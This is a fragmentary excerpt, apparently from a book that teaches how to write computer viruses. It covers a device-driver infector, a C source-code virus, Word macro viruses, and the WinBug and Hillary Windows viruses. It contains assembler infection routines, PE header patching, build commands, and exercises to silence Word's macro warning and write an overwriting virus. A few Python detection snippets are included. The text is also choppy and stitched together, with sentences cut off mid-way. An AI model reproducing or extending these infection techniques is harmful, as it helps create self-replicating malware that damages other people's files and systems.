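```

A strategy pointer that lands far beyond the rest of the driver's code is one thing such an inspection might make visible.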
[Figure: flowchart and file layout. Flowchart labels: Infected? (Y/N), Set STRAT pointer in header to VIRUS, Append virus image to SYS file. Layout labels: STRAT Routine, INTR Routine, VIRUS, DEVIRUS.]
catable, just as they were with COM files. Without that, all data
references will be wrong after the first infection.
Exercises
1. Later versions of DOS allow a device driver to be loaded into high
memory above the 640K barrier by calling the driver with a new
command, “DEVICEHIGH=”. As written, DEVIRUS won’t recognize
this command as specifying a device. Modify it so that it will recognize
both “DEVICE=” and “DEVICEHIGH=”.
2. Later versions of DOS have made room for very large device drivers,
which take up more than 64 kilobytes. These drivers have a format more
like an EXE file, with a header, etc. Learn something about the structure
of these files and modify DEVIRUS so that it can infect them too.
The Concept
A source code virus attempts to infect the source code for a
program—the C, PAS or ASM files—rather than the executable.
The resulting scenario looks something like this (Figure 13.1):
Software Developer A contracts a source code virus in the C files
for his newest product. The files are compiled and released for sale.
The product is successful, and thousands of people buy it. Most of
the people who buy Developer A’s software will never even have
the opportunity to watch the virus replicate because they don’t
develop software and they don’t have any C files on their system.
However, Developer B buys a copy of Developer A’s software and
puts it on the system where his source code is. When Developer B
executes Developer A’s software, the virus activates, finds a nice
C file to hide itself in, and jumps over there. Even though Developer
B is fairly virus-conscious, he doesn’t notice that he’s been infected
because he only does virus checking on his EXE’s, and his scanner
can’t detect the virus in Developer A’s code. A few weeks later,
Developer B compiles a final version of his code and releases it,
complete with the virus. And so the virus spreads. . . .
While such a virus may only rarely find its way into code that
gets widely distributed, there are hundreds of thousands of C
compilers out there, and potentially hundreds of millions of files to
infect. The virus would be inactive as far as replication goes, unless
it was on a system with source files. However, a logic bomb in the
compiled version could be activated any time an executable with
the virus is run. Thus, all of Developer A’s and Developer B’s clients
could suffer loss from the virus, regardless of whether or not they
developed software of their own.
[Figure 13.1. Labels: Program A Source, Compile, Program A Executable, Virus, Compiled Virus as Source Code, Distribution.]
1 Ralf Burger, Computer Viruses and Data Protection (Abacus, Grand Rapids, MI: 1991), p. 252.
Source code viruses also offer the potential to migrate across
environments. For example, if a programmer was doing develop-
ment work on some Unix software, but he put his C code onto a
DOS disk and took it home from work to edit it in the evening, he
might contract the virus from a DOS-based program. When he
copied the C code back to his workstation in the morning, the virus
would go right along with it. And if the viral C code was sufficiently
portable (not too difficult) it would then properly compile and
execute in the Unix environment.
A source code virus will generally be more complex than an
executable-infector with a similar level of sophistication. There are
two reasons for this: (1) The virus must be able to survive a compile,
and (2) The syntax of a high level language (and I include assembler
here) is generally much more flexible than machine code. Let’s
examine these difficulties in more detail:
Since the virus attacks source code, it must be able to put a copy
of itself into a high-level language file in a form which that compiler
will understand. A C-infector must put C-compileable code into a
C file. It cannot put machine code into the file because that won’t
make sense to the compiler. However, the infection must be put into
a file by machine code executing in memory. That machine code is
the compiled virus. Going from source code to machine code is
easy—the compiler does it for you. Going backwards—which the
virus must do—is the trick the virus must accomplish. (Figure 13.2)
The first and most portable way to “reverse the compile,” if
you will, is to write the viral infection routine twice: once as a
compilable routine and once as initialized data. When compiled,
the viral routine coded as data ends up being a copy of the source
code inside of the executable. The executing virus routine then just
copies the virus-as-data into the file it wants to infect. Alternatively,
if one is willing to sacrifice portability, and use a compiler that
accepts inline assembly language, one can write most of the virus
as DB statements, and do away with having a second copy of the
source code worked in as data. The DB statements will just contain
machine code in ASCII format, and it is easy to write code to
convert from binary to ASCII. Thus the virus-as-instructions can
make a compileable ASCII copy of itself directly from its binary
instructions. Either approach makes it possible for the virus to
survive a compile and close the loop in Figure 13.2.
[Figure 13.2. Labels: C File, Compiler, EXE File, Virus as Source Code, Virus as Machine Code.]
Obviously, a source code virus must place a call to itself
somewhere in the program source code so that it will actually get
called and executed. Generally, this is a more complicated task
when attacking source code than when attacking executables.
Executables have a fairly rigid structure which a virus can exploit. For
example, it is an easy matter to modify the initial cs:ip value in an
EXE file so that it starts up executing some code added to the end
of the file, rather than the intended program. Not so for a source
file. Any virus infecting a source file must be capable of
understanding at least some rudimentary syntax of the language that
file is written in. For example, if a virus wanted to put a call to itself in
the main() routine of a C program, it had better know the difference
between
/*
void main(int argc, char *argv[]) {
This is just a comment explaining how to
do_this(); The program does this
and_this(); And this, twice.
and_this();
. . . }
*/
and
or it could put its call inside of a comment that never gets compiled
or executed!
Source code viruses could conceivably achieve any level of
sophistication in parsing code, but only at the expense of becoming
as large and unwieldy as the compiler itself. Normally, a very
limited parsing ability is best, along with a good dose of politeness
to avoid causing problems in questionable circumstances.
So much for the two main hurdles a source code virus must
overcome.
Generally source code viruses will be large compared to ordi-
nary executable viruses. Ten years ago that would have made them
impossible on microcomputers, but today programs hundreds of
kilobytes in length are considered small. So adding 10 or 20K to
one isn’t necessarily noticeable. Presumably the trend toward big-
ger and bigger programs will continue, making the size factor much
less important.
what I’m calling a source code virus. These guys were all LISP
freaks (and come to think of it LISP would be a nice language to
do this kind of stuff in). They weren’t so much the assembly
language tinkerers of the eighties who really made a name for
viruses.
The whole discussion we had was very hypothetical, though I
got the feeling some of these guys were trying these ideas out.
Looking back, I don’t know if the discussion was just born of
intellectual curiosity or whether somebody was trying to develop
something like this for the military, and couldn’t come out and say
so since it was classified. (The AI Lab was notorious for its secret
government projects.) I’d like to believe it was just idle speculation.
On the other hand, it wouldn’t be the first time the military was
quietly working away on some idea that seemed like science fiction.
The next thread I find is this: Fred Cohen, in his book A Short
Course on Computer Viruses, described a special virus purportedly
put into the first Unix C compiler for the National Security Agency
by Ken Thompson.2 It was essentially designed to put a back door
into the Unix login program, so Thompson (or the NSA) could log
into any system. Essentially, the C compiler would recognize the
login program’s source when it compiled it, and modify it.
However, the C compiler also had to recognize another C compiler’s
source, and set it up to propagate the “fix” to put the back door in
the login. Although Thompson evidently did not call his fix a virus,
that’s what it was. It tried to infect just one class of programs: C
compilers. And its payload was designed to miscompile only the
login program. This virus wasn’t quite the same as a source code
virus, because it didn’t add anything to the C compiler’s source
files. Rather, it sounds like a hybrid sort of virus, which could only
exist in a compiler. Nonetheless, this story (which is admittedly
third hand) establishes the existence of viral technology in the
seventies. It also suggests again that these early viruses were not
too unlike the source code viruses I’m discussing here.
One might wonder, why would the government be interested
in developing viruses along the lines of source code viruses, rather
in some function in the file. If you don’t notice these little additions,
you may never notice the virus is there.
SCV1 is not very sneaky about where it puts these additions to
a C file. The include statement is inserted on the first line of a file
that is not part of a comment, and the call to sc_virus() is always placed
right before the last closing brace in a file. That makes it the last
thing to execute in the last function in a file. For example, if we take
the standard C example program HELLO.C:
/* An easy program to infect with SCV1 */
#include <stdio.h>
void main()
{
printf("%s","Hello, world.");
}
and let it get infected by SCV1, it will then look like this:
/* An easy program to infect with SCV1 */
#include <virus.h>
#include <stdio.h>
void main()
{
printf("%s","Hello, world.");
sc_virus();}
When executed, the virus must perform two tasks: (1) it must
look for the VIRUS.H file. If VIRUS.H is not present, the virus
must create it in your INCLUDE directory, as specified in your
environment. (2) The virus must find a suitable C file to infect, and
if it finds one, it must infect it. It determines whether a C file is
suitable to infect by searching for the
#include <virus.h>
statement. If it finds it, SCV1 assumes the file has already been
infected and passes it by. To avoid taking up a lot of time executing
on systems that do not even have C files on them, SCV1 will not
look for VIRUS.H or any C files if it does not find an INCLUDE
environment variable. Checking the environment is an extremely
fast process, requiring no disk access, so the average user will have
no idea the virus is there.
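The same marker that SCV1 uses to recognize its own work also gives a developer an easy way to check a source tree for it. The sketch below looks for the two additions described above, the include of virus.h and the call to sc_virus(), in the text of a C file. The function name and the regular expressions are my own, and a renamed variant would of course slip past a check this simple.

```python
import re

# The include line is matched case-insensitively, since DOS file names are.
INCLUDE_MARKER = re.compile(r"^\s*#\s*include\s*<virus\.h>",
                            re.IGNORECASE | re.MULTILINE)
CALL_MARKER = re.compile(r"\bsc_virus\s*\(")


def scv1_markers(source_text):
    """Return which of the two SCV1 additions appear in a C source string."""
    found = []
    if INCLUDE_MARKER.search(source_text):
        found.append("include")
    if CALL_MARKER.search(source_text):
        found.append("call")
    return found


if __name__ == "__main__":
    clean = '''/* An easy program to infect with SCV1 */
#include <stdio.h>
void main()
{
printf("%s","Hello, world.");
}
'''
    infected = '''/* An easy program to infect with SCV1 */
#include <virus.h>
#include <stdio.h>
void main()
{
printf("%s","Hello, world.");
sc_virus();}
'''
    print("clean:   ", scv1_markers(clean))
    print("infected:", scv1_markers(infected))
```

Run over every C file in a project, a check like this takes the place of the executable scanning that Developer B relied on.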
VIRUS.H may be broken down into two parts. The first part is
simply the code which gets compiled. The second part is the
character constant virush[], which contains the whole of
VIRUS.H as a constant. If you think about it, you will see that some
coding trick must be employed to handle the recursive nature of
virush[]. Obviously, virush[] must contain all of VIRUS.H,
including the specification of the constant virush[] itself. The
function write_virush(), which is responsible for creating a new
VIRUS.H in the infection process, handles this task by using two
indices into the character array. When the file is written,
write_virush() uses the first index to get a character from the array
and write it directly to the new VIRUS.H file. As soon as a null in
virush[] is encountered, this direct write process is suspended.
Then, write_virush() begins to use the second index to go through
virush[] a second time. This time it takes each character in
virush[] and converts it to its numerical value, e.g.,
‘A’ becomes ‘65’
and writes that number to VIRUS.H. Once the whole array has been
coded as numbers, write_virush() goes back to the first index
and continues the direct transcription until it reaches the end of the
array again.
direct EXE infector. And the power of the language assures us that
much more complex and effective viruses could be concocted.
Test Drive
To create the virus in its executable form, you must first create
VIRUS.H from VIRUS.HS using the CONSTANT, and then com-
pile SCV1.C with Microsoft C 7.0. (Other versions will probably
work.) The following commands will do the job, provided you have
your include environment variable set to \C700\INCLUDE:
constant
copy virus.h \c700\include
cl scv1.c
#include <stdio.h>
#include <v784.h>
/******************************************************************************/
void main()
{
s784(); // just go infect a .c file
}
#ifndef S784
#define S784
#include <stdio.h>
#include <dos.h>
static char a784[]={0};
Exercises
1. Compress the virus SCVIRUS.PAS to see how small you can make it.
2. Write an assembly language source virus which attacks files that end
with “END XXX” (so it knows these are the main modules of
programs). Change the starting point XXX to point to a DB statement
where the virus is, followed by a jump to the original starting point. You
shouldn’t need a separate data and code version of the virus to design
this one.
Chapter 14
Macro Viruses
Source Code for this Chapter: \MACRO\CONCEPT.DOC
\MACRO\CON97.DOC
Macro viruses are not, in principle, any different from some of
the viruses we’ve already discussed. Take the idea of a source code
virus which we developed in the last chapter and apply it to a
language that is interpreted, rather than compiled, and you have
what is essentially a macro virus.
If you’ve gotten this far in this book, you are a fairly competent
programmer, so perhaps I don’t need to bore you by detailing the
differences between a compiled language and an interpreted lan-
guage, but just in case some of my readers have never played with
interpreted BASIC or something, let’s review.
Generally, with a compiled language, a source file is translated
by a compiler into machine code and written to disk in the form of
an executable file. The executable file is then distributed to the
people who will use the program. With an interpreted language, the
source file is never translated to machine code. Rather, an inter-
preter takes the source and interprets the instructions it contains,
performing the actions they specify. As such, to distribute the
program, one must distribute the source code for the program.
A virus can work with an interpreted programming language
in very much the same way as it does in a compiled programming
language. In fact, such a virus can be a bit simpler because it doesn’t
have to carry around a copy of its own source code with it. Since
the source is being interpreted, the source is already right there,
either in memory or on disk. (Unless the interpreter encrypts it
somehow.)
Microsoft Word 97
Well, Microsoft realized they had made a big boo-boo in
making it so easy to write viruses for their word processor. So they
put a routine in Word for Windows 97 to check for the presence of
macros in a file and warn the user. The user then has the choice of
whether to disable the macros or not. This helps a lot in preventing
the spread of viruses unaware, as the macros cannot execute unless
the user allows them to.
Still, the sorry truth is that all too many people still let the
macros execute. So Microsoft did one other thing to frustrate the
virus writers: they changed their macro language from Word Basic
to Visual Basic. They provided a translation utility to make the
macros from Word 95 work with Word 97. To translate a call, say
CountMacros(0,0) to Word 97, all you have to do is change it to
WordBasic.CountMacros(0,0). Thus, it’s pretty easy to update
macros, and Word will even do it for you. There is, however, one
exception to this: the call MacroCopy doesn’t work that way.
There’s a completely new way that it has to be done, and Word
won’t translate it for you. Neither will Word let you copy a macro
to a different name.
This little trick effectively makes all Word 95 macro viruses
sterile in Word 97. That was probably a smart move on Microsoft’s
part. However, these big changes mean that a lot of old anti-virus
3. Save your file and exit Word. The next time you open the
file (if you allow macros to execute), your NORMAL.DOT will be
infected. After that, every file you save will be infected.
Now I suppose you can see just how easy Word viruses are,
and why they’re so popular.
Exercises
1. Add a macro to Concept 97 to turn off Word’s query for whether you
want to run embedded macros when files are loaded. That way, if your
virus gets run once, Word will never bother the user again, while the
virus is busy at work infecting his whole system.
2. Write an overwriting virus that infects every file in the current directory
by copying itself to that file when the infected file is saved.
Chapter 15
A Windows
Companion Virus
Source Code for this Chapter: \HOSTS\HOST1.ASM
\HOSTS\HOST2.ASM
\WINBUG\WINBUG.ASM
A Simplest Program
The first step in learning to program Windows with assembler
is simply to write a few ordinary programs. Then we’ll take one of
those ordinary programs and turn it into a companion virus.
Programming in 32-bit Windows is not fundamentally different
from programming in DOS or 16-bit Windows, except that one cannot
simply call DOS interrupts to get things done. Calling the 32-bit
Windows Application Program Interface (API) is mandatory. Still,
the simplest program one can write is not any more complex than
the simplest DOS program. That simplest program just returns
This just called DOS Function 4CH, which terminated the program.
A 32-bit Windows program that does the same thing looks like this:
HOST:
push LARGE -1
call ExitProcess
This just puts a (32 bit) return value on the stack and calls the
Windows API to exit the program. There is nothing very fancy
going on here. The Windows API works by pushing parameters
onto the stack and calling functions, rather than by storing parame-
ters in registers and calling interrupt vectors.
Now, of course, neither in DOS nor in Windows can one simply
put the above three lines in a file and expect them to assemble
properly. Some assembler directives are necessary to tell the as-
sembler and linker what kind of a file to create, what’s code, what’s
data, and so on.
If we throw in all the assembler directives, the DOS program
looks like this:
.model tiny
.code
ORG 100H
HOST:
mov ax,4C00H
int 21H
END HOST
The first line sets up the model type, which here we choose to be a
tiny model for creating a COM file, the second line specifies the
code segment, and the code is specified to originate at offset 100H.
After that is the program, followed by the END statement which
tells the assembler where execution of the code begins. Simple
enough.
.data
dummy dd ?
.code
extrn ExitProcess:PROC
HOST:
push LARGE -1
call ExitProcess
END HOST
Here we must specify the .386 directive because the program is for
use only on 386 and above processors. We specify the flat model,
which is 32-bit Windows. Next, notice that we specify a dummy
data variable which never gets used. For some reason Windows 95
(or the linker) doesn’t like it if we attempt to write a program
that has no data segment. Thus, a dummy variable is put in just to
keep everybody happy. Then comes the code segment, which
contains the program, and also an external declaration of ExitProcess.
Since ExitProcess is part of the Windows API, it must be
declared as external to the program. All in all, the program does not
look that different from its DOS counterpart.
To assemble the program correctly, assuming it is named
HOST1.ASM, the commands are
tasm32 /ml HOST1,,;
tlink32 /Tpe /aa /c HOST1,HOST1,, import32.lib
.386
locals
jumps
.model flat,STDCALL
INCLUDE HOST2.INC
end HOST
A Companion Virus
Typically, ordinary Windows programs are designed to present
the user with an interface, and sit there waiting for him to tell the
program to do something. Our simple HOST2 program works this
way. It displays a window, and waits for user input. The only real
user input it accepts is to maximize or minimize the window, or
quit.
A virus doesn’t fit this paradigm of operation very well. The
typical virus doesn’t want to announce its presence by displaying
a window, and then ask the user if he wants to infect files, etc. The
thought of it is absurd. Rather, a virus goes out and infects files
without the user’s consent or knowledge. Simply put, it just does
its job. So what use does a virus have for a GUI interface? None,
unless it wants to play a prank on the user and let its presence be
known.
As such, we have to lay aside the standard Windows program-
ming techniques in order to program viruses. We already did that
with the simplest possible Windows program, HOST1. That pro-
gram just did something without user input: it terminated. It never
displayed a window. It never gave you any real indication that it
had executed. That’s a good starting place for a virus! Let’s take it
and add some functionality to it. We’ll call our creation WinBug.
Although WinBug could be written in a high level language,
like C++ or Delphi, we’ll work through it in assembler. That will
be a good way to cut our teeth on Windows-based assembler. Doing
it in a high level language is left to the exercises.
and then works back through the type definitions in the include files
(e.g. WINNT.H) to find out what the variables actually are. Using
assembler notation, the function call looks like this:
DWORD FindFirstFile(DWORD,DWORD);
INFECT_FILES:
lea eax,[ebp+FIND_DATA] ;address of search data structure
push eax
push OFFSET EXE_FILE ;’*.EXE’
call FindFirstFileA ;do find first
cmp eax,-1
jz EXIT_IFILES ;nothing found, exit
mov [ebp+SRCH_HANDLE],eax ;else save search handle here
IFS1: call INFECT_FILE ;file found, infect it
lea eax,[ebp+FIND_DATA]
push eax
mov eax,[ebp+SRCH_HANDLE]
push eax
call FindNextFileA ;find next
or eax,eax ;anything found?
jnz IFS1 ;infect anything found
EXIT_IFILES:
ret ;else exit
with the underscore in it, from the file name reported by the Find
File. To do that, it simply copies the name at offset 44 in this
structure to a variable NFNAME, and throws on the underscore.
Next, it begins to open files. The basic approach to opening files is
to call CreateFileA, as follows:
push 0 ;open file for new host with ’_’
push 2 ;file attributes = hidden
push 1 ;create new file
push 0 ;no security
push 0 ;no sharing
push 40000000H ;write mode
lea eax,[ebp+NFNAME]
push eax ;@name of file
call CreateFileA
cmp eax,-1 ;failed to create new file?
je IFR ;yes, skip infect
mov [ebp+FHANDLE2],eax ;else save handle here
Wow! That’s even easier than it is in DOS! The host executes, and
nobody is any the wiser that a virus is lurking about.
Running WinBug
To assemble and link WinBug, use the commands:
tasm32 /ml winbug,,;
tlink32 /Tpe /aa /c /v winbug,winbug,, import32.lib
Exercises
1. Write a WinBug virus using C++. All you have to do is convert the
assembler code to C, which is quite simple.
offsets, just as the COM infector did. By coding the start of the virus
like this:
VIRUS: call RELOC
RELOC: pop edi
one can get the actual 32-bit offset of RELOC as the virus is running
in the edi register, and then manipulate it as desired. For example,
if we then subtract,
sub edi,OFFSET RELOC
just like that most ancient COM infector. The next step the virus
will take is to build a stack frame for dynamic variables:
push ebp
sub esp,WORKSP
mov ebp,esp
will do quite nicely. This routine will infect all of the files which
FIND_FIRST_EXE and FIND_NEXT_EXE can locate. Of
course, it is in these subroutines where the big differences are.
Anyway, once the virus is done with its work, it must restore
the stack,
add esp,WORKSP
pop ebp
is sufficient, as long as the virus has explicitly set the value of HOST
when it made the infection. Unlike a COM file, the startup offset
of the host is not fixed. This value is specified in the PE file header,
and the actual offset may be relocated when the file is loaded into
memory. However, since a near jump is relative, the virus can insert
the proper number into the jump instruction in a file and it doesn’t
need to worry about it after that. We’ll discuss this more when we
examine the infection process.
As you can see, the basic functionality of the Hillary virus is
essentially the same as any other virus. For the most part, the main
control routine looks just the same as any other virus—and we could
discuss it with very little knowledge of the structure of the PE file.
The lesson you should learn here is this: don’t let 32-bit viruses
scare you. They are not any different, in principle, from any other
virus.
Okay, now let’s go on to look at how Hillary searches for hosts
to execute, and in the process learn how the Windows 95 API
works...
you get
call JMP1R
.
.
.
JMP1R: jmp DWORD PTR [FindFirstFileRef]
the call to a jump which the assembler typically replaces a call with.
In the case of FindFirstFile, the secret number we want is given by
FIND_FIRST_FILE EQU 0BFF77893H
where N is the size of the virus in bytes. Thus, a virus that is 256
bytes long will be able to infect half of all programs. A virus that
is 500 bytes long will only be able to infect 2.3% of all programs.
Obviously, size is a very important consideration in writing a virus
like this.
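The two percentages quoted above are consistent with a simple model, which is assumed here because the formula itself is not reproduced in this passage: if the unused space in the last 512-byte block of a code section is uniformly distributed, the fraction of files with at least N free bytes is (512 - N)/512. The function name below is hypothetical and the sketch only does the arithmetic.

```python
def fraction_with_room(n_bytes: int, block: int = 512) -> float:
    """Fraction of files whose last block has at least n_bytes of slack.

    Assumes (this is an assumption, not a measurement) that the slack is
    uniformly distributed over 0..block-1 bytes.
    """
    if n_bytes <= 0:
        return 1.0
    if n_bytes >= block:
        return 0.0
    return (block - n_bytes) / block


print(fraction_with_room(256))                    # 0.5
print(round(fraction_with_room(500) * 100, 1))    # 2.3 (percent)
```

Under that assumption the curve falls off linearly, which is why the last few dozen bytes matter so much.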
512 bytes is really not much room for writing a virus in a 32-bit
environment. 32-bit code tends to eat up quite a bit of space fairly
fast. As such, an important consideration in the Hillary virus is
code-crunching. Although in my past books I’ve tended to stay
away from code crunching because it can quickly make code
difficult, if not impossible, to understand, there is good reason for
it here, so we will broach the subject.
[Figure: layout of a PE file, showing the PE EXE Header, the PE Header, the .text section raw data, and the .data section raw data.]
Thus, simply checking for space in the code section makes double-
infection impossible.
The checkup is carried out by the INFECT_FILE routine. The
first step is to open the file in read/write mode. There are two
possible API calls which could be used to open files in 32-bit
Windows, OpenFile and CreateFile. We’ll use the CreateFile
procedure because it requires the least amount of data to open a file.
All of the Windows API calls which we use in this book are
documented in the appendices on the Companion Disk, so you can
examine them in detail there. Basically the call to CreateFile looks
like this:
xor eax,eax ;we need to push a bunch of 0 dwords
push eax ;and this is most efficient here
push eax ;FATTR_NORMAL
push LARGE OPEN_EXISTING
push eax
push eax
push LARGE GENERIC_READ or GENERIC_WRITE
lea eax,[ebp+FIND_DATA+44] ;file name from search structure
push eax
call DWORD PTR [edi+CREATE_FILE]
each push eax requires only one byte. The xor eax,eax takes two
bytes. Thus, pushing four zero dwords can be accomplished in
2+4=6 bytes rather than in 2x4=8 bytes.
The next step after opening the file is to read enough data in to
get the DOS header, the DOS stub program, and the PE Header
along with at least the first Section Header. Hillary allocates a buffer
of 1024 bytes, which is more than sufficient to get this data in the
vast majority of programs.
Most Windows API functions allow a lot more functionality
than we really need, and that means pushing lots more parameters
onto the stack than actually mean anything to the virus. All of these
parameters require plenty of 32-bit code. Thus, in the interest of
code conservation, any API call that is required more than once
should be put in a single subroutine that can be called when needed.
In order to read the file, we define a subroutine FILE_READ which
will call the API function ReadFile. A typical FILE_READ function
looks like this:
FILE_READ:
mov eax,edi
mov ebx,OFFSET READ_FILE
add ebx,eax
push LARGE 0 ;overlapping data structure
lea eax,[ebp+IOBYTES]
push eax ;address of bytes read
push ecx ;bytes to read
push edx ;buffer to read data into
push DWORD PTR [ebp+FHANDLE] ;file handle
call DWORD PTR [ebx]
or eax,eax ;set z if read failed
ret
Note that we are using ebx to build the address to call here, rather
than just using a call DWORD PTR [edi+ReadFile]. The
reason for this has to do with code crunching. We’ll explain it in a
few pages.
This FILE_READ routine is passed the number of bytes to read
in ecx, and the location to put those bytes in edx. Hillary uses it to
read 1024 bytes into FILEBUF, a dynamic data area in the stack
frame,
mov ecx,1024
lea edx,[ebp+FILEBUF]
call FILE_READ
Once the data is in memory, the virus can check the header
information to see if this file can be infected.
The PE file format starts with an old-style DOS MZ header. To
find the PE header, one first checks the word at offset 18H, which is
the offset of the relocation table in the DOS MZ header. If it is
greater than or equal to 40H, then it is an extended format EXE file,
and the size of the DOS part of the file, which is also the offset of
the extended header, is stored at offset 3CH.
After the end of the DOS part of the file, one will find an
extended EXE header. Typically these headers start with two letters
which define the format. The 16-bit Windows header starts with an
“NE” and, appropriately enough, the PE Header starts with the
letters “PE” followed by two nulls (since just about everything here
is oriented around 32-bit words).
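The header layout just described can be checked with a few lines of read-only parsing. The sketch below is an illustration in Python rather than the book's assembler, and the function name find_pe_header is hypothetical. It only inspects a buffer: it applies the 18H test from the text, reads the header offset at 3CH, and looks for the “PE” signature followed by two nulls.

```python
import struct


def find_pe_header(data: bytes):
    """Return the offset of the PE signature in data, or None.

    Read-only inspection of a buffer that starts with a DOS MZ header.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    # Word at 18H: offset of the DOS relocation table. The text treats a
    # value of 40H or more as the mark of an extended format EXE file.
    (reloc_table_offset,) = struct.unpack_from("<H", data, 0x18)
    if reloc_table_offset < 0x40:
        return None
    # Dword at 3CH: file offset of the extended (NE, PE, ...) header.
    (new_header_offset,) = struct.unpack_from("<I", data, 0x3C)
    if new_header_offset + 4 > len(data):
        return None  # header lies outside the bytes we were given
    if data[new_header_offset:new_header_offset + 4] != b"PE\0\0":
        return None
    return new_header_offset
```

Given the first 1024 bytes of a typical PE file, this returns the offset at which the Image File Header and Optional Header can then be read.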
Hillary first checks to see if the file is an extended EXE file,
and if so, it attempts to locate the PE header. Code to accomplish
this is given by
cmp BYTE [ebp+esi+18H],40H ;valid extended header?
jc IFEX ;no, just a DOS EXE, exit
mov ax,[ebp+FILEBUF+3CH] ;now find the PE header
cwde ;eax = offset where PE header starts
add esi,eax
mov eax,[ebp+FILEBUF] ;eax = PE header signature
cmp eax,’EP’ ;proper PE header?
jne IFEX ;nope, don’t attempt to infect
Note that esi is here set up so that ebp+esi point to the start of the
PE Header in the stack frame. It will be left pointing there for the
remainder of the infection process to permit easy access to the PE
Header and associated data structures.
If successful in locating the PE Header, Hillary next examines
it to see if there is room in the code section for the virus. To
understand this process, we must dig into the PE Header and the
Section Headers a little. The PE Header itself consists of three parts
(see Figure 16.4). The first is just the “PE” signature. Next comes
the Image File Header, a data structure detailed in Figure 16.5. Next
is the Optional Image Header, detailed in Figure 16.6. Why it is
called optional I have no idea, as there is nothing at all optional
about it. Following these data structures comes the Section Table,
which is just an array of Section Headers (Figure 16.8).
Now, Hillary makes an important shortcut here. When most
compilers create a PE-EXE file, they put the code in the first
section, and label that section with the name .text. Rather than
searching all of the sections in the file for code, Hillary only checks
the first section. If this section is code, Hillary further checks to see
if there is room for itself there. If it is not code, Hillary doesn’t
attempt to infect the file. This appears to be a fairly reliable method,
as I have yet to find a file in which the first section was not code.
To check for code in the first section, Hillary examines the
Characteristics in the first Section Header. If bit 5 (20H) in this set
of flags is set, the section contains executable code. This is
accomplished with the simple test,
test BYTE PTR [ebp+esi+PE_HEADER+36],20H
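For reference, the byte tested above is the low byte of the Characteristics dword, which sits at offset 36 in a 40-byte Section Header. The value 20H there is the "contains code" flag (bit 5), which is distinct from the "executable in memory" flag at bit 29 (20000000H). The following read-only Python sketch decodes both. The function name is hypothetical, and the constant names follow the usual Windows header names.

```python
import struct

IMAGE_SCN_CNT_CODE = 0x00000020      # bit 5: section contains code
IMAGE_SCN_MEM_EXECUTE = 0x20000000   # bit 29: section is executable in memory


def section_flags(section_header: bytes) -> dict:
    """Decode two Characteristics flags from a 40-byte PE section header."""
    if len(section_header) < 40:
        raise ValueError("a section header is 40 bytes long")
    # Characteristics is the last dword of the header, at offset 36.
    (characteristics,) = struct.unpack_from("<I", section_header, 36)
    return {
        "contains_code": bool(characteristics & IMAGE_SCN_CNT_CODE),
        "mem_execute": bool(characteristics & IMAGE_SCN_MEM_EXECUTE),
    }
```

A typical .text section carries both flags, so either test would pass for it, but only the bit 5 test matches the instruction shown.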
Then Hillary compares the resulting number with its own code size,
cmp eax,VIR_SIZE
jnc _IF3 ;ok, continue
If there is enough room (no carry flag) then this file is fit for
infection.
This contains the offset from the beginning of the file to the start
of the first section, e.g., to the start of the code. To this, the virus
adds the VirtualSize, or the size of the code itself,
add eax,[ebp+esi+PE_SIZE+8]
With that accomplished, eax points to the end of the code in the
file. Now, to call the SEEK_WRITE function in the virus, which
seeks to a given file position and writes a block of data there, eax
must be set to the position in the file to write to, edx must point to
the memory buffer to write from, and ecx must contain the number
of bytes to write. Since eax is already set up properly above, the
remaining code needed to write the virus to the file is given by
lea edx,[edi+OFFSET VIRUS]
mov ecx,VIR_SIZE
call SEEK_WRITE
Now, for the first section in the program, the RVAs become
fairly trivial. They are just the distance from the beginning of the
section to the item in question, plus the code base. Thus, if the entry
point for the code is at offset 3FAH from the start of the first section
in the file, then its RVA will be 3FAH plus the code base, which is
given by the BaseOfCode variable in the PE Header. The code to
calculate the new offset is given by
add eax,[ebp+esi+44] ;add BaseOfCode
mov [ebp+esi+40],eax ;and save AddressOfEntryPoint
when eax comes into this code from the above, containing the old
VirtualSize, which is just where the virus was written. These two
numbers are the only things that need to be modified in the header
in order to make the virus work. Once the above is accomplished,
the PE Header and the first Section Header can be written back to
disk using the SEEK_WRITE function.
The virus must modify the DWORD value to transfer control to the
host in the right place. Supposing ecx contains the (old) VirtualSize
of the host’s code, and eax contains the old entry point, the code to
compute the new distance to jump is given by
sub eax,ecx
sub eax,OFFSET HADDR+5 - OFFSET VIRUS
and then written to disk. The location to write to in the disk file is
the same location as where the body of the virus was written, plus
OFFSET HADDR+1 - OFFSET VIRUS. With that write, the
infection process is complete, and the virus goes on to look for
another host to infect.
Code Crunching
Code crunching—getting the computer to do something with
fewer bytes of code—is a dying art. With hard disk memory costing
only about ten cents per megabyte, and RAM costing only about
$5/megabyte, there is usually little motivation to try to write small
code. The object oriented techniques which have become so popu-
lar in programming today (whether they are joyfully accepted by
programmers or shoved down their throats is another matter) are
incredibly inefficient from the perspective of the size of code.
That’s why a word processor that took up 50K ten years ago now
takes up 30 megabytes, though it certainly hasn’t become anything
like 600 times more powerful.
Crunching code is certainly an art, too. It’s hard to teach
someone to crunch code effectively. Either you have a knack for it
or you don’t. So without trying to teach you in detail how to do it,
let me give you a few principles, and look at how they were applied
to Hillary to make it smaller and more effective.
Let’s start with the last technique first, because it is so easy and
yet so easy to ignore. The easiest thing to do when assembling a
source is to tell the assembler to perform multiple passes. In 32-bit
code, a single pass assembler must assume that all relative jumps,
etc., are NEAR jumps, and all constants which haven’t been defined
otherwise yet are 32-bit constants. So, if I code a jump like this:
jz EXIT
.
.
EXIT:
program, and simply get rid of them. For example, instead of coding
the main control routine like this:
VIRUS:
.
.
.
call FIND_FIRST_EXE
jz EXIT_VIRUS
.
.
.
jmp HOST
This saves both a call and a ret instruction, a total of six bytes.
Likewise, one might look for groups of subroutines that could
be combined. For example, Hillary is coded with a routine called
SEEK_WRITE which seeks to a particular location in a file and then
writes there. This combination is efficient because a seek must be
performed before each write in the virus. Thus, it saves six bytes
per call to combine these routines instead of making separate seek
and write routines and calling them both each time.
Again, one might look for combinations of subroutines which
use common code, and try to combine them. Hillary does this with
its FILE_WRITE and FILE_READ routines, since they are iden-
tical except for the final call they make to the Windows API. So
rather than having two copies of all that code in the virus, the
routines are combined, and the DWORD which forms part of the
call is determined dynamically, coding it as
call DWORD PTR [ebx]
rather than
call DWORD PTR [edi+WRITE_FILE]
etc. While setting up the dynamic call takes a few extra bytes, the
net result is a savings.
Finally, one can look for subroutines which can fall through to
other subroutines when they terminate. For example, the
INFECT_FILE routine might have ended like this:
call SEEK_WRITE
jmp IFEX
Then you can just get rid of the last two instructions and put RTN2
